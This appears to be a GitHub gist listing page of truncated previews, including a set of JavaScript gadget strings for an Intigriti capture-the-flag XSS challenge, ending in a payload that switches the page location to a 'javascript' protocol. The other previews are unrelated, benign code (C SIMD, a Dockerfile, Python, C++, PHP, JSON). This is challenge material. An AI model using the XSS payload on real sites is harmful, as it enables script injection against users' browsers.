- Category: Web
- Impact: Medium
- Solves: ~50
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| xss = "'\xff'.codePointAt()"; // To obtain the number 255 | |
| xss = "Date.length"; // To obtain the digit 7 | |
| xss = "''+RegExp()"; // To return the pattern string "/(?:)/" | |
| xss = "''.split('')"; // To get an empty array as `Array []` (from https://github.com/denysdovhan/wtfjs) | |
| xss = "history.length"; // To get any number per page interaction, useful to avoid using like single quotes | |
| xss = "localStorage.x"; // From the user `localStorage` who will retrieve any contained value from the `x` key | |
| xss = "origin.match()"; // To get an array of one element as `['',index:0,input:'https://challenge-0523.intigriti.io',groups:undefined]` | |
| xss = "(''+RegExp()).at()"; // To return a slash string "/" with only 18 allowed characters | |
| xss = "(''+RegExp()).at()+(''+RegExp('t.ly'))+'testing'"; // To get a valid URL like "//t.ly/testing" of an URL shortener | |
| xss = "with(Reflect)set(get(frames,'locatio'+'n'),'pr\otocol','javascri\pt')"; // To get a XSS arbitrary code on `Chrome` with some url p |
Siss3l
/ 0723.md
Last active
July 26, 2023 00:02
Intigriti's July 2023 Web challenge thanks to @kavishkagihan
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdint.h> | |
| #include <immintrin.h> | |
| int main() { // Working often on https://www.onlinegdb.com | gcc -O3 -mgfni -msse2 m128.c -o m128 && ./m128 | |
| const __m128i r = _mm_gf2p8affine_epi64_epi8(_mm_set1_epi64(*(__m64*)"AaCcGgTt"),_mm_set1_epi64((__m64)433471464134410240),0); | |
| for (int k=0;k<8;k++) {printf("(%c: %i)","AaCcGgTt"[k],((/*int*/uint8_t*)&r)[k]);} // (A: 0)(a: 0)(C: 1)(c: 1)(G: 2)(g: 2)(T: 3)(t: 3) | |
| return 0; // https://stackoverflow.com/q/28939652 | Illegal instruction (core dumped) | _mm512_load_epi64 | |
| } |
Siss3l
/ Dockerfile
Created
August 10, 2023 11:00
Playing more or less Ankama-Games with Docker from any web browser
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FROM dorowu/ubuntu-desktop-lxde-vnc:latest | |
| WORKDIR /root/Desktop | |
| ENV WINEPREFIX=/opt/wine WINEARCH=win32 TARGET_APPIMAGE=Setup-x86_64.AppImage APPIMAGE_EXTRACT_AND_RUN=1 | |
| EXPOSE 8080 | |
| # Have to get the launcher as Setup-x86_64.AppImage file beforehand, for strictly educational purposes. | |
| COPY --chmod=755 ./Setup-x86_64.AppImage . | |
| RUN ./Setup-x86_64.AppImage --appimage-extract && printf '#!/bin/sh\n/root/Desktop/squashfs-root/zaap --no-sandbox' > run.sh && chmod a+x run.sh | |
| RUN apt update && apt upgrade -y && apt install default-jdk libfuse2 nano wine -y | |
| # Here the commands for building/launching the container: docker build -t dockerfus -f Dockerfile . && docker run -p 8080:80 -v /dev/shm:/dev/shm dockerfus | |
| # Then the graphical desktop-sharing system can be accessed from http://localhost:8080/ on any web browser (there may be some restrictions in place). |
Siss3l
/ as2ast.json
Created
August 18, 2023 17:45
Conversion of ActionScript to Abstract Syntax Tree code in JSON
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ | |
| { | |
| "type": "File", | |
| "start": 0, | |
| "end": 43328, | |
| "loc": { | |
| "start": { | |
| "line": 1, | |
| "column": 0, | |
| "index": 0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| This code provides functions to find the last nonzero values of a positive factorial. | |
| """ | |
| def f(n: int, k: int) -> int: | |
| """ | |
| Returns the k last nonzero digits. | |
| .. note:: | |
| As f(10**100, 13) is a Googolbang where the 13 last nonzero |
Siss3l
/ 1223.md
Created
December 15, 2023 22:01
Intigriti's December 2023 Web Challenge thanks to @meme-lord
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <string> | |
| #include <vector> | |
| #include <sstream> | |
| #include <iostream> | |
| #include <algorithm> | |
| typedef unsigned char UINT8; | |
| typedef unsigned short UINT16; | |
| typedef unsigned int UINT32; | |
| typedef unsigned long long UINT64; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """<?php | |
| function source() { // require("key.php"); | |
| echo "<pre>"; | |
| highlight_string(file_get_contents(__FILE__)); | |
| echo "</pre>"; | |
| } | |
| function quit() { | |
| // source(); |
OlderNewer